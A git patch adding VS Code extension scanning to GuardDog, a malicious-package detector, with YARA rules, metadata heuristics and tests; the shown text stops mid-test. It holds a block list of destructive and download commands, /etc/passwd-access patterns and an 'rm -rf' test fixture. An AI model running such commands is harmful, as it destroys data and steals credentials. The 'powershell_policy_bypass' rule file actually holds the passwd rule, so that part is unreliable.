From 64d915d682b42a3ee18c785a99b98456a7b2fc09 Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Wed, 16 Jul 2025 16:25:52 +0200 Subject: [PATCH 1/7] Add extensions ecosystem support for Guarddog --- README.md | 45 ++- guarddog/analyzer/analyzer.py | 68 ++-- guarddog/analyzer/metadata/__init__.py | 3 + .../analyzer/metadata/extension/__init__.py | 18 ++ .../metadata/extension/empty_information.py | 38 +++ .../extension/suspicious_permissions.py | 108 +++++++ .../extension/suspicious_publisher.py | 59 ++++ guarddog/analyzer/sourcecode/__init__.py | 15 +- .../extension_obfuscator_dot_io.yar | 30 ++ .../extension_powershell_policy_bypass.yar | 13 + ...tension_suspicious_passwd_access_linux.yar | 13 + guarddog/ecosystems.py | 3 + guarddog/reporters/human_readable.py | 2 + guarddog/scanners/__init__.py | 5 + guarddog/scanners/extension_scanner.py | 196 ++++++++++++ .../metadata/test_extension_metadata.py | 291 ++++++++++++++++++ tests/core/test_extension_scanner.py | 126 ++++++++ 17 files changed, 1009 insertions(+), 24 deletions(-) create mode 100644 guarddog/analyzer/metadata/extension/__init__.py create mode 100644 guarddog/analyzer/metadata/extension/empty_information.py create mode 100644 guarddog/analyzer/metadata/extension/suspicious_permissions.py create mode 100644 guarddog/analyzer/metadata/extension/suspicious_publisher.py create mode 100644 guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar create mode 100644 guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar create mode 100644 guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar create mode 100644 guarddog/scanners/extension_scanner.py create mode 100644 tests/analyzer/metadata/test_extension_metadata.py create mode 100644 tests/core/test_extension_scanner.py diff --git a/README.md b/README.md index 14ff9323..c648f122 100644 --- a/README.md +++ b/README.md @@ -6,9 +6,9 @@ GuardDog

-GuardDog is a CLI tool that allows to identify malicious PyPI and npm packages or Go modules. It runs a set of heuristics on the package source code (through Semgrep rules) and on the package metadata. +GuardDog is a CLI tool that allows to identify malicious PyPI and npm packages, Go modules, or VSCode extensions. It runs a set of heuristics on the package source code (through Semgrep rules) and on the package metadata. -GuardDog can be used to scan local or remote PyPI and npm packages or Go modules using any of the available [heuristics](#heuristics). +GuardDog can be used to scan local or remote PyPI and npm packages, Go modules, or VSCode extensions using any of the available [heuristics](#heuristics). It downloads and scans code from: @@ -16,6 +16,7 @@ It downloads and scans code from: * PyPI: Source files (tar.gz) packages hosted in [PyPI.org](https://pypi.org/) * Go: GoLang source files of repositories hosted in [GitHub.com](https://github.com) * GitHub Actions: Javascript source files of repositories hosted in [GitHub.com](https://github.com) +* VSCode Extensions: Extensions (.vsix) packages hosted in [marketplace.visualstudio.com](https://marketplace.visualstudio.com/) ![GuardDog demo usage](docs/images/demo.png) @@ -78,6 +79,15 @@ guarddog github_action scan DataDog/synthetics-ci-github-action guarddog github_action verify /tmp/repo/.github/workflows/main.yml +# Scan VSCode extensions from the marketplace +guarddog extension scan ms-python.python + +# Scan a specific version of a VSCode extension +guarddog extension scan ms-python.python --version 2023.20.0 + +# Scan a local VSCode extension directory or VSIX archive +guarddog extension scan /tmp/my-extension/ + # Run in debug mode guarddog --log-level debug npm scan express ``` @@ -192,6 +202,37 @@ Source code heuristics: | npm-steganography | Identify when a package retrieves hidden data from an image and executes it | | npm-dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL | | npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system | + + +### VSCode Extensions + +For VSCode extensions that are implemented in JavaScript/TypeScript, +GuardDog will run the same source code heuristics as for npm packages, plus specialized YARA rules. + +Source code heuristics: + +| **Heuristic** | **Description** | +|:-------------:|:---------------:| +| npm-serialize-environment | Identify when a package serializes 'process.env' to exfiltrate environment variables | +| npm-obfuscation | Identify when a package uses a common obfuscation method often used by malware | +| npm-silent-process-execution | Identify when a package silently executes an executable | +| shady-links | Identify when a package contains an URL to a domain with a suspicious extension | +| npm-exec-base64 | Identify when a package dynamically executes code through 'eval' | +| npm-install-script | Identify when a package has a pre or post-install script automatically running commands | +| npm-steganography | Identify when a package retrieves hidden data from an image and executes it | +| npm-dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL | +| npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system | +| extension_obfuscator_dot_io | Detect usage of obfuscator.io service patterns | +| extension_powershell_policy_bypass | Identify PowerShell execution policy bypass attempts | +| extension_suspicious_passwd_access_linux | Detect suspicious access to Linux password files | + +Metadata heuristics: + +| **Heuristic** | **Description** | +|:-------------:|:---------------:| +| empty_information | Identify extensions with an empty description field | +| suspicious-permissions | Identify extensions with potentially dangerous permissions or suspicious characteristics | +| suspicious-publisher | Identify extensions with suspicious publisher verification status and typosquatting | ## Custom Rules diff --git a/guarddog/analyzer/analyzer.py b/guarddog/analyzer/analyzer.py index 4f61512a..6b549fd7 100644 --- a/guarddog/analyzer/analyzer.py +++ b/guarddog/analyzer/analyzer.py @@ -95,7 +95,12 @@ def analyze(self, path, info=None, rules=None, name: Optional[str] = None, versi results = metadata_results["results"] | sourcecode_results["results"] errors = metadata_results["errors"] | sourcecode_results["errors"] - return {"issues": issues, "errors": errors, "results": results, "path": path} + output = {"issues": issues, "errors": errors, "results": results, "path": path} + # Including extension info - pending discussion + # if info is not None: + # output["package_info"] = info + + return output def analyze_metadata(self, path: str, info, rules=None, name: Optional[str] = None, version: Optional[str] = None) -> dict: @@ -183,6 +188,11 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: rule_results: defaultdict[dict, list[dict]] = defaultdict(list) + # Define verbose rules that should only show "file-level" triggers + verbose_rules = { + "DETECT_FILE_obfuscator_dot_io", + } + rules_path = { rule_name: os.path.join(SOURCECODE_RULES_PATH, f"{rule_name}.yar") for rule_name in all_rules @@ -206,26 +216,46 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: matches = scan_rules.match(scan_file_target_abspath) for m in matches: - for s in m.strings: - for i in s.instances: + rule_name = m.rule + + if rule_name in verbose_rules: + # For verbose rules, we only show that the rule was triggered in the matching file + # We're logging appearances once instead of issue-counting + file_already_reported = any( + finding["location"].startswith(scan_file_target_relpath + ":") + for finding in rule_results[rule_name] + ) + + if not file_already_reported: finding = { - "location": f"{scan_file_target_relpath}:{i.offset}", - "code": self.trim_code_snippet(str(i.matched_data)), - 'message': m.meta.get("description", f"{m.rule} rule matched") + "location": f"{scan_file_target_relpath}:1", + "code": f"Rule triggered in file (matches hidden for brevity)", + 'message': m.meta.get("description", f"{rule_name} rule matched") } - - # since yara can match the multiple times in the same file - # leading to finding several times the same word or pattern - # this dedup the matches - if [ - f - for f in rule_results[m.rule] - if finding["code"] == f["code"] - ]: - continue - - issues += len(m.strings) - rule_results[m.rule].append(finding) + issues += 1 + rule_results[rule_name].append(finding) + else: + # For non-verbose rules, show detailed matches as before + for s in m.strings: + for i in s.instances: + finding = { + "location": f"{scan_file_target_relpath}:{i.offset}", + "code": self.trim_code_snippet(str(i.matched_data)), + 'message': m.meta.get("description", f"{rule_name} rule matched") + } + + # since yara can match the multiple times in the same file + # leading to finding several times the same word or pattern + # this dedup the matches + if [ + f + for f in rule_results[rule_name] + if finding["code"] == f["code"] + ]: + continue + + issues += len(m.strings) + rule_results[rule_name].append(finding) except Exception as e: errors["rules-all"] = f"failed to run rule: {str(e)}" diff --git a/guarddog/analyzer/metadata/__init__.py b/guarddog/analyzer/metadata/__init__.py index 0853e650..08f20894 100644 --- a/guarddog/analyzer/metadata/__init__.py +++ b/guarddog/analyzer/metadata/__init__.py @@ -3,6 +3,7 @@ from guarddog.analyzer.metadata.pypi import PYPI_METADATA_RULES from guarddog.analyzer.metadata.go import GO_METADATA_RULES from guarddog.analyzer.metadata.github_action import GITHUB_ACTION_METADATA_RULES +from guarddog.analyzer.metadata.extension import EXTENSION_METADATA_RULES from guarddog.ecosystems import ECOSYSTEM @@ -16,3 +17,5 @@ def get_metadata_detectors(ecosystem: ECOSYSTEM) -> dict[str, Detector]: return GO_METADATA_RULES case ECOSYSTEM.GITHUB_ACTION: return GITHUB_ACTION_METADATA_RULES + case ECOSYSTEM.EXTENSION: + return EXTENSION_METADATA_RULES diff --git a/guarddog/analyzer/metadata/extension/__init__.py b/guarddog/analyzer/metadata/extension/__init__.py new file mode 100644 index 00000000..e7703441 --- /dev/null +++ b/guarddog/analyzer/metadata/extension/__init__.py @@ -0,0 +1,18 @@ +from typing import Type + +from guarddog.analyzer.metadata import Detector +from guarddog.analyzer.metadata.extension.empty_information import ExtensionEmptyInfoDetector +from guarddog.analyzer.metadata.extension.suspicious_publisher import ExtensionSuspiciousPublisherDetector +from guarddog.analyzer.metadata.extension.suspicious_permissions import ExtensionSuspiciousPermissionsDetector + +EXTENSION_METADATA_RULES = {} + +classes: list[Type[Detector]] = [ + ExtensionEmptyInfoDetector, + ExtensionSuspiciousPublisherDetector, + ExtensionSuspiciousPermissionsDetector, +] + +for detectorClass in classes: + detectorInstance = detectorClass() # type: ignore + EXTENSION_METADATA_RULES[detectorInstance.get_name()] = detectorInstance \ No newline at end of file diff --git a/guarddog/analyzer/metadata/extension/empty_information.py b/guarddog/analyzer/metadata/extension/empty_information.py new file mode 100644 index 00000000..2387a3ed --- /dev/null +++ b/guarddog/analyzer/metadata/extension/empty_information.py @@ -0,0 +1,38 @@ +""" Empty Information Detector for Extensions + +Detects if an extension contains an empty description +""" +import logging +from typing import Optional + +from guarddog.analyzer.metadata.empty_information import EmptyInfoDetector + +log = logging.getLogger("guarddog") + + +class ExtensionEmptyInfoDetector(EmptyInfoDetector): + """Detects extensions with empty description information""" + + def detect(self, package_info, path: Optional[str] = None, name: Optional[str] = None, + version: Optional[str] = None) -> tuple[bool, str]: + + log.debug(f"Running extension empty description heuristic on extension {name} version {version}") + + if not package_info or not isinstance(package_info, dict): + return True, "Extension has no package information" + + manifest = package_info.get("manifest", {}) + marketplace = package_info.get("marketplace", {}) + source = package_info.get("source", "unknown") + + return self._detect_with_metadata(manifest, marketplace, source) + + def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str) -> tuple[bool, str]: + """Detect empty information with pre-extracted metadata""" + + manifest_description = manifest.get("description", "").strip() + manifest_display_name = manifest.get("displayName", "").strip() + + if not manifest_description and not manifest_display_name: + return True, self.MESSAGE_TEMPLATE % "Extension Marketplace (manifest)" + return False, "" \ No newline at end of file diff --git a/guarddog/analyzer/metadata/extension/suspicious_permissions.py b/guarddog/analyzer/metadata/extension/suspicious_permissions.py new file mode 100644 index 00000000..7ffeefd0 --- /dev/null +++ b/guarddog/analyzer/metadata/extension/suspicious_permissions.py @@ -0,0 +1,108 @@ +from typing import Optional + +from guarddog.analyzer.metadata.detector import Detector + + +class ExtensionSuspiciousPermissionsDetector(Detector): + """Detects extensions with suspicious permissions or capabilities""" + + def __init__(self): + super().__init__( + name="suspicious-permissions", + description="Identify extensions with potentially dangerous permissions or suspicious characteristics" + ) + + def detect(self, package_info, path: Optional[str] = None, name: Optional[str] = None, + version: Optional[str] = None) -> tuple[bool, Optional[str]]: + + if not package_info or not isinstance(package_info, dict): + return False, None + + manifest = package_info.get("manifest", {}) + marketplace = package_info.get("marketplace", {}) + source = package_info.get("source", "unknown") + + return self._detect_with_metadata(manifest, marketplace, source) + + def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str) -> tuple[bool, Optional[str]]: + + # Check manifest for suspicious activation events + activation_events = manifest.get("activationEvents", []) + suspicious_activations = [] + + for event in activation_events: + if isinstance(event, str): + # Very broad activation events that could be suspicious + if event == "*": + suspicious_activations.append(event) + elif "onFileSystem:" in event and "*" in event: + suspicious_activations.append(event) + + if suspicious_activations: + return True, f"Extension uses suspicious activation events: {', '.join(suspicious_activations)}" + + # Check for suspicious scripts in manifest + scripts = manifest.get("scripts", {}) + if scripts: + suspicious_script_patterns = ['rm -rf', 'del /s', 'format', 'shutdown', 'curl', 'wget', 'powershell'] + for script_name, script_content in scripts.items(): + if isinstance(script_content, str): + for pattern in suspicious_script_patterns: + if pattern in script_content.lower(): + return True, f"Extension has suspicious script '{script_name}': contains '{pattern}'" + + dependencies = manifest.get("dependencies", {}) + dev_dependencies = manifest.get("devDependencies", {}) + all_deps = {**dependencies, **dev_dependencies} + + # The list is NOT exhaustive, adjust as needed + suspicious_deps = ['child_process', 'fs-extra', 'shelljs', 'node-pty'] + found_suspicious_deps = [dep for dep in all_deps.keys() if any(sus in dep for sus in suspicious_deps)] + + if found_suspicious_deps: + return True, f"Extension uses potentially dangerous dependencies: {', '.join(found_suspicious_deps[:3])}" + + if marketplace and source == "remote": + download_count = marketplace.get("download_count", 0) + # Check if publisher is not verified but has high privileges + publisher_info = marketplace.get("publisher", {}) + if isinstance(publisher_info, dict): + flags = publisher_info.get("flags", []) + is_verified = any("verified" in str(flag).lower() for flag in flags) if flags else False + is_domain_verified = marketplace.get("publisher_isDomainVerified", False) + + # Suspicious: unverified publisher with low download count + if not is_verified and not is_domain_verified and download_count < 1000: + return True, "Extension from unverified publisher with low download count" + + if flags: + flag_strings = [str(flag).lower() for flag in flags] + suspicious_flag_patterns = ['preview', 'deprecated', 'malware'] # malware might unnecessary since extensions are swiftly removed from the marketplace + found_suspicious_flags = [flag for flag in flag_strings + if any(pattern in flag for pattern in suspicious_flag_patterns)] + if found_suspicious_flags: + return True, f"Extension has suspicious marketplace flags: {', '.join(found_suspicious_flags)}" + + contributes = manifest.get("contributes", {}) + if contributes: + # Check for dangerous contribution points + if contributes.get("terminal"): + return True, "Extension contributes terminal functionality which could be dangerous" + + if contributes.get("taskDefinitions"): + return True, "Extension contributes task definitions which could execute arbitrary commands" + + # Will add typosquatting checks for most used commands + + # Check categories for suspicious types + categories = manifest.get("categories", []) + if categories: + suspicious_categories = ['debuggers', 'other', 'testing', 'snippets'] + category_strings = [str(cat).lower() for cat in categories] + found_suspicious_cats = [cat for cat in category_strings + if any(sus in cat for sus in suspicious_categories)] + if found_suspicious_cats and len(categories) == 1: + # Only flag if it's the sole category + return True, f"Extension has potentially suspicious sole category: {found_suspicious_cats[0]}" + + return False, None \ No newline at end of file diff --git a/guarddog/analyzer/metadata/extension/suspicious_publisher.py b/guarddog/analyzer/metadata/extension/suspicious_publisher.py new file mode 100644 index 00000000..7bab15c2 --- /dev/null +++ b/guarddog/analyzer/metadata/extension/suspicious_publisher.py @@ -0,0 +1,59 @@ +from typing import Optional + +from guarddog.analyzer.metadata.detector import Detector + + +class ExtensionSuspiciousPublisherDetector(Detector): + """Detects extensions with suspicious publisher characteristics""" + + def __init__(self): + super().__init__( + name="suspicious-publisher", + description="Identify extensions with suspicious publisher verification status and typosquatting" + ) + + def detect(self, package_info, path: Optional[str] = None, name: Optional[str] = None, + version: Optional[str] = None) -> tuple[bool, Optional[str]]: + + if not package_info or not isinstance(package_info, dict): + return False, None + + manifest = package_info.get("manifest", {}) + marketplace = package_info.get("marketplace", {}) + source = package_info.get("source", "unknown") + + return self._detect_with_metadata(manifest, marketplace, source, package_info) + + def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str, package_info: dict) -> tuple[bool, Optional[str]]: + """Detect suspicious publisher patterns with pre-extracted metadata""" + + manifest_publisher = manifest.get("publisher", "").strip() + + if not manifest_publisher: + return False, None # Already handled by empty-information detector + + # TODO: Check for typosquatting using the dedicated detector + + verification_info = [] + if marketplace and source == "remote": + publisher_info = marketplace.get("publisher", {}) + + if isinstance(publisher_info, dict): + # Check if publisher is verified (positive information) + flags = publisher_info.get("flags", []) + is_verified = any("verified" in str(flag).lower() for flag in flags) if flags else False + + if is_verified: + verification_info.append("Publisher is verified") + + # Check if publisher domain is verified (positive information) + is_domain_verified = marketplace.get("publisher_isDomainVerified", False) + if is_domain_verified: + verification_info.append("Publisher domain is verified") + + # If we have positive verification information, include it in a non-suspicious way + # This doesn't return True (not suspicious) but provides information until more robust heuristics are implemented + if verification_info: + pass + + return False, None \ No newline at end of file diff --git a/guarddog/analyzer/sourcecode/__init__.py b/guarddog/analyzer/sourcecode/__init__.py index 0c47b630..c158549a 100644 --- a/guarddog/analyzer/sourcecode/__init__.py +++ b/guarddog/analyzer/sourcecode/__init__.py @@ -22,6 +22,7 @@ class SourceCodeRule: id: str file: str description: str + ecosystem: ECOSYSTEM @dataclass @@ -38,7 +39,6 @@ class SempgrepRule(SourceCodeRule): Semgrep rule are language specific Content of rule in yaml format is accessible through rule_content """ - ecosystem: ECOSYSTEM rule_content: dict @@ -54,7 +54,7 @@ def get_sourcecode_rules( for rule in SOURCECODE_RULES: if kind and not isinstance(rule, kind): continue - if not (getattr(rule, "ecosystem", ecosystem) == ecosystem): + if rule.ecosystem != ecosystem: continue yield rule @@ -78,6 +78,7 @@ def get_sourcecode_rules( case "javascript" | "typescript" | "json": ecosystems.add(ECOSYSTEM.NPM) ecosystems.add(ECOSYSTEM.GITHUB_ACTION) + ecosystems.add(ECOSYSTEM.EXTENSION) case "go": ecosystems.add(ECOSYSTEM.GO) case _: @@ -111,9 +112,17 @@ def get_sourcecode_rules( rule_id = pathlib.Path(file_name).stem description_regex = fr'\s*rule\s+{rule_id}[^}}]+meta:[^}}]+description\s*=\s*\"(.+?)\"' + # Default to EXTENSION for general YARA rules (can be adjusted as when other ecosystems are supported) + rule_ecosystem = ECOSYSTEM.EXTENSION + with open(os.path.join(current_dir, file_name), "r") as fd: match = re.search(description_regex, fd.read()) rule_description = "" if match: rule_description = match.group(1) - SOURCECODE_RULES.append(YaraRule(id=rule_id, file=file_name, description=rule_description)) + SOURCECODE_RULES.append(YaraRule( + id=rule_id, + file=file_name, + description=rule_description, + ecosystem=rule_ecosystem + )) diff --git a/guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar b/guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar new file mode 100644 index 00000000..f66cc1a7 --- /dev/null +++ b/guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar @@ -0,0 +1,30 @@ +rule DETECT_FILE_obfuscator_dot_io +{ + meta: + + author = "T HAMDOUNI, Datadog" + description = "Detects Javascript code obfuscated with obfuscator.io. Note that although malicious code is often obfuscated, there are legitimate use cases including protecting intellectual property or preventing reverse engineering." + + strings: + $id1 = /(^|[^A-Za-z0-9])_0x[a-f0-9]{4,8}/ ascii + $id2 = /(^|[^A-Za-z0-9])a0_0x[a-f0-9]{4,8}/ ascii + + $rot_push = "['push'](_0x" ascii + $rot_shift = "['shift']()" ascii + $loop1 = /while\s*\(\!\!\[\]\)/ + + $def1 = "Function('return\\x20(function()\\x20'+'{}.constructor(\\x22return\\x20this\\x22)(" ascii + $def2 = "{}.constructor(\"return this\")(" ascii + $def3 = "{}.constructor(\\x22return\\x20this\\x22)(\\x20)" base64 + + $tok2 = /parseInt\(_0x[a-f0-9]{4,8}\(0x[a-f0-9]+\)\)/ ascii nocase // strong indicator + + condition: + filesize < 5MB and + ( + ( (#id1 + #id2) >= 6 ) or + ( ( $rot_push and $rot_shift ) or $loop1 ) or + ( any of ($def*) or #tok2 > 5 ) + ) + +} diff --git a/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar b/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar new file mode 100644 index 00000000..926757a9 --- /dev/null +++ b/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar @@ -0,0 +1,13 @@ +rule DETECT_FILE_powershell_policy_bypass +{ + meta: + author = "T HAMDOUNI, Datadog" + credits = "" + description = "Detects suspicious read access to /etc/passwd file, which is often targeted by malware for credential harvesting" + + strings: + $cli = /(cat|less|more|head|tail)\s+.{0,100}\/etc\/passwd/ nocase + $read = /(readFile|readFileSync)\(\s*['"]\/etc\/passwd/ nocase + condition: + $cli or $read +} \ No newline at end of file diff --git a/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar b/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar new file mode 100644 index 00000000..76ffe20f --- /dev/null +++ b/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar @@ -0,0 +1,13 @@ +rule DETECT_FILE_suspicious_passwd_access_linux +{ + meta: + author = "T HAMDOUNI, Datadog" + credits = "" + description = "Detects suspicious read access to /etc/passwd file, which is often targeted by malware for credential harvesting" + + strings: + $cli = /(cat|less|more|head|tail)\s+.{0,100}\/etc\/passwd/ nocase + $read = /(readFile|readFileSync)\(\s*['"]\/etc\/passwd/ nocase + condition: + $cli or $read +} \ No newline at end of file diff --git a/guarddog/ecosystems.py b/guarddog/ecosystems.py index fcd73c73..d4359b7c 100644 --- a/guarddog/ecosystems.py +++ b/guarddog/ecosystems.py @@ -6,6 +6,7 @@ class ECOSYSTEM(Enum): NPM = "npm" GO = "go" GITHUB_ACTION = "github-action" + EXTENSION = "extension" def get_friendly_name(ecosystem: ECOSYSTEM) -> str: @@ -18,5 +19,7 @@ def get_friendly_name(ecosystem: ECOSYSTEM) -> str: return "go" case ECOSYSTEM.GITHUB_ACTION: return "GitHub Action" + case ECOSYSTEM.EXTENSION: + return "Extension" case _: return ecosystem.value diff --git a/guarddog/reporters/human_readable.py b/guarddog/reporters/human_readable.py index 40c71713..2bd35f2b 100644 --- a/guarddog/reporters/human_readable.py +++ b/guarddog/reporters/human_readable.py @@ -44,6 +44,8 @@ def _format_code_line_for_output(code) -> str: num_issues = results.get("issues") lines = [] + package_info = results.get("package_info") + if num_issues == 0: lines.append( "Found " diff --git a/guarddog/scanners/__init__.py b/guarddog/scanners/__init__.py index 55627bc7..0b5a41c5 100644 --- a/guarddog/scanners/__init__.py +++ b/guarddog/scanners/__init__.py @@ -8,6 +8,7 @@ from .go_package_scanner import GoModuleScanner from .go_project_scanner import GoDependenciesScanner from .github_action_scanner import GithubActionScanner +from .extension_scanner import ExtensionScanner from .scanner import PackageScanner, ProjectScanner from ..ecosystems import ECOSYSTEM @@ -33,6 +34,8 @@ def get_package_scanner(ecosystem: ECOSYSTEM) -> Optional[PackageScanner]: return GoModuleScanner() case ECOSYSTEM.GITHUB_ACTION: return GithubActionScanner() + case ECOSYSTEM.EXTENSION: + return ExtensionScanner() return None @@ -57,4 +60,6 @@ def get_project_scanner(ecosystem: ECOSYSTEM) -> Optional[ProjectScanner]: return GoDependenciesScanner() case ECOSYSTEM.GITHUB_ACTION: return GitHubActionDependencyScanner() + case ECOSYSTEM.EXTENSION: + return None # we're not including dependency scanning for this PR return None diff --git a/guarddog/scanners/extension_scanner.py b/guarddog/scanners/extension_scanner.py new file mode 100644 index 00000000..9b649fa8 --- /dev/null +++ b/guarddog/scanners/extension_scanner.py @@ -0,0 +1,196 @@ +import json +import logging +import os +import pathlib +import tempfile +import typing +import zipfile + +import requests + +from guarddog.analyzer.analyzer import Analyzer +from guarddog.ecosystems import ECOSYSTEM +from guarddog.scanners.scanner import PackageScanner +from guarddog.utils.archives import safe_extract + +log = logging.getLogger("guarddog") + +MARKETPLACE_URL = "https://marketplace.visualstudio.com/_apis/public/gallery/extensionquery" +MARKETPLACE_HEADERS = { + "Content-Type": "application/json", + "Accept": "application/json;api-version=3.0-preview.1" +} +MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE = "Microsoft.VisualStudio.Services.VSIXPackage" + + +class ExtensionScanner(PackageScanner): + def __init__(self) -> None: + super().__init__(Analyzer(ECOSYSTEM.EXTENSION)) + + def download_and_get_package_info(self, directory: str, package_name: str, version=None) -> typing.Tuple[dict, str]: + """ + Downloads a VSCode extension from the marketplace and extracts it + + Args: + directory: Directory to download to + package_name: Extension identifier (publisher.extension format) + version: Specific version or default to latest + + Returns: + Tuple of (extension metadata(manifest and marketplace) info, extracted_path) + """ + marketplace_metadata, vsix_url = self._get_marketplace_info_and_url(package_name, version) + + file_extension = ".vsix" + vsix_path = os.path.join(directory, package_name.replace("/", "-") + file_extension) + extracted_path = vsix_path.removesuffix(file_extension) + + log.debug(f"Downloading VSCode extension from {vsix_url}") + + self.download_compressed(vsix_url, vsix_path, extracted_path) + + manifest_metadata = self._extract_manifest_metadata(extracted_path) + + combined_metadata = { + "marketplace": marketplace_metadata, + "manifest": manifest_metadata, + "source": "remote" + } + + return combined_metadata, extracted_path + + def _get_marketplace_info_and_url(self, package_name: str, version: typing.Optional[str] = None) -> typing.Tuple[dict, str]: + """Get marketplace metadata and VSIX download URL""" + payload = { + "filters": [ + { + "criteria": [ + { + "filterType": 7, + "value": package_name + } + ] + } + ], + "flags": 958 + } + + response = requests.post(MARKETPLACE_URL, headers=MARKETPLACE_HEADERS, json=payload) + + if response.status_code != 200: + raise Exception(f"Received status code: {response.status_code} from VSCode Marketplace") + + data = response.json() + + if not data.get("results") or not data["results"][0].get("extensions"): + raise Exception(f"Extension {package_name} not found in marketplace") + + extension_info = data["results"][0]["extensions"][0] + versions = extension_info.get("versions", []) + + if not versions: + raise Exception("No versions available for this extension") + + target_version = None + if version is None: + # if not version is provided, default to latest + target_version = versions[0] + else: + for v in versions: + if v.get("version") == version: + target_version = v + break + if target_version is None: + raise Exception(f"Version {version} not found for extension") + + # Extract download URL + files = target_version.get("files", []) + vsix_url = None + for file_info in files: + if file_info.get("assetType") == MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE: + vsix_url = file_info.get("source") + break + + if not vsix_url: + raise Exception("No VSIX download link available for this extension") + + # Extract statistics from the statistics array + stats = {stat["statisticName"]: stat["value"] for stat in extension_info.get("statistics", [])} + # ... and the marketplace metadata + # TODO: it might be interesting to add heuristics regarding the rating cound and the weghtedRating (see the ranking algo hack) + marketplace_metadata = { + "extensionName": extension_info.get("extensionName", ""), + "flags": extension_info.get("flags", []), + "download_count": int(stats.get("downloadCount", 0)), + "publisher": extension_info.get("publisher", {}), + "publisher_flags": extension_info.get("publisher_flags", ""), + "publisher_domain": extension_info.get("domain", ""), + "publisher_isDomainVerified": extension_info.get("publisher_isDomainVerified", False), + } + + return marketplace_metadata, vsix_url + + def _extract_manifest_metadata(self, extracted_path: str) -> dict: + """Extract metadata from the extension's package.json manifest""" + + log.debug(f"Starting manifest extraction from: {extracted_path}") + + package_json_path = None + for root, dirs, files in os.walk(extracted_path): + if "package.json" in files: + package_json_path = os.path.join(root, "package.json") + break + + if package_json_path is None: + log.warning(f"No package.json found in {extracted_path}") + return {} + + log.debug(f"Found package.json at: {package_json_path}") + try: + with open(package_json_path, 'r', encoding='utf-8') as f: + manifest_data = json.load(f) + log.debug(f"Successfully parsed package.json with {len(manifest_data)} keys") + except (json.JSONDecodeError, IOError) as e: + log.warning(f"Failed to read manifest from {package_json_path}: {e}") + return {} + + registered_commands = manifest_data.get("contributes", {}).get("commands", []) + extracted_metadata = { + "name": manifest_data.get("name", ""), + "displayName": manifest_data.get("displayName", ""), + "description": manifest_data.get("description", ""), + "version": manifest_data.get("version", ""), + "publisher": manifest_data.get("publisher", ""), + "repository": manifest_data.get("repository", {}), + "activationEvents": manifest_data.get("activationEvents", []), + "categories": manifest_data.get("categories", []), + "registeredCommands": registered_commands, + } + + log.debug(f"Extracted manifest metadata: {extracted_metadata}") + return extracted_metadata + + + def scan_local(self, path: str, rules=None) -> dict: + """ + Scan a local VSCode extension directory + + Args: + path: Path to extension directory containing package.json + rules: Set of rules to use + + Returns: + Scan results + """ + # Extract manifest metadata from the extension directory + manifest_metadata = self._extract_manifest_metadata(path) + + # For local directory scanning, only use manifest metadata + package_info = { + "marketplace": {}, # Empty for local scans + "manifest": manifest_metadata, + "source": "local" + } + + # Use the analyzer to scan the directory with the package info + return self.analyzer.analyze(path, package_info, rules) diff --git a/tests/analyzer/metadata/test_extension_metadata.py b/tests/analyzer/metadata/test_extension_metadata.py new file mode 100644 index 00000000..b22d74b5 --- /dev/null +++ b/tests/analyzer/metadata/test_extension_metadata.py @@ -0,0 +1,291 @@ +import pytest + +from guarddog.analyzer.metadata.extension.empty_information import ExtensionEmptyInfoDetector +from guarddog.analyzer.metadata.extension.suspicious_permissions import ExtensionSuspiciousPermissionsDetector +from guarddog.analyzer.metadata.extension.suspicious_publisher import ExtensionSuspiciousPublisherDetector + + +class TestExtensionEmptyInfoDetector: + detector = ExtensionEmptyInfoDetector() + + def test_no_package_info(self): + matches, message = self.detector.detect(None) + assert matches + assert "no package information" in message + + def test_empty_manifest(self): + package_info = { + "manifest": { + "name": "test-extension", + "description": "", + "displayName": "" + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert "Extension Marketplace (manifest)" in message + + def test_non_empty_manifest_local(self): + package_info = { + "manifest": { + "name": "test-extension", + "description": "A useful extension", + "displayName": "Test Extension" + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert not matches + + +class TestExtensionSuspiciousPermissionsDetector: + detector = ExtensionSuspiciousPermissionsDetector() + + def test_no_package_info(self): + matches, message = self.detector.detect(None) + assert not matches + assert message is None + + def test_wildcard_activation_event(self): + package_info = { + "manifest": { + "activationEvents": ["*"] + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "suspicious activation events" in message + assert "*" in message + + def test_suspicious_filesystem_activation(self): + package_info = { + "manifest": { + "activationEvents": ["onFileSystem:*"] + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "suspicious activation events" in message + assert "onFileSystem:*" in message + + def test_safe_activation_events(self): + package_info = { + "manifest": { + "activationEvents": ["onCommand:myextension.hello", "onLanguage:python"] + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert not matches + + def test_suspicious_script_rm_rf(self): + package_info = { + "manifest": { + "scripts": { + "postinstall": "rm -rf /tmp/something" + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = 